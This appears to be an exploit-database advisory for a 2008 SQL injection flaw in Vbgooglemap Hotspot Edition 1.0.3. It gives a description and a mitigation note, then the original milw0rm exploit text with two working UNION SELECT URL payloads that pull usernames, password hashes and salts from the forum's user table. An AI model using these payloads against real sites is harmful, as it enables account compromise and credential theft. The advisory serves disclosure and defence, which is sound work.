Vbgooglemap Hotspot Edition 1.0.3 Remote SQL Injection Vulnerability

vendor:

Vbgooglemap Hotspot Edition

by:

elusiven

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Vbgooglemap Hotspot Edition

Affected Version From: 1.0.3

Affected Version To: 1.0.3

Patch Exists: NO

Related CWE: N/A

CPE: a:vbgooglemap:vbgooglemap_hotspot_edition:1.0.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Vbgooglemap Hotspot Edition 1.0.3 Remote SQL Injection Vulnerability

Vbgooglemap Hotspot Edition 1.0.3 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This request contains malicious SQL statements that are executed in the backend database. This can allow an attacker to gain access to sensitive information such as usernames and passwords stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#######################################################################
#
# Vbgooglemap Hotspot Edition 1.0.3 Remote SQL Injection Vulnerability
#
#######################################################################

# Bug discovered by elusiven
# It was priv8

Bug: 

[Target]/[Path]/vbgooglemaphse.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user--

or:

[Target]/[Path]/mapa.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user--

# Special gr33tz for: my sweet Monia :*
# gr33tz for: artii2, GrZyB997, Sp!riT, Msb, Adish, Mandr4ke, eXc!t3, aqtyq, tescik2, stranger, Voldo, KrafT,
# DonJapkO, Gaara, br0wdz, uncalled, cOndemned aka f60.1, zbt, matisto, pr0metheus and all gd pplz from the underground.

#################################################
#
# Vbgooglemap Hotspot Edition 1.0.3 SQL INJECTION
#
#################################################

# milw0rm.com [2008-09-27]